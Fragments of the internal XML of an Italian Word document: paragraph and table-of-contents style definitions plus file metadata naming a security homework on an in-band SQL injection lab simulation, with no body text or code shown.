      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="ＭＳ 明朝" w:cs=""/>
      <w:color w:val="1A1A1A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i w:val="false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6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i w:val="false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altoaindice">
    <w:name w:val="Salto a indice"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ice"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
      </w:tabs>
      <w:ind w:hanging="0" w:left="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="TOC 2"/>
    <w:basedOn w:val="Indice"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="right" w:pos="8789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LibreOffice/7.6.2.1$Windows_X86_64 LibreOffice_project/56f7684011345957bbf33a7ee678afaf4d2ba333</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>5</Pages>
  <Words>685</Words>
  <Characters>3866</Characters>
  <CharactersWithSpaces>4610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Simone Di Berardino</dc:creator>
  <dc:description>generated by python-docx</dc:description>
  <dc:language>it-IT</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-15T00:46:38Z</dcterms:modified>
  <cp:revision>18</cp:revision>
  <dc:subject>SQL injection in-band – simulazione di laboratorio</dc:subject>
  <dc:title>Homework sicurezza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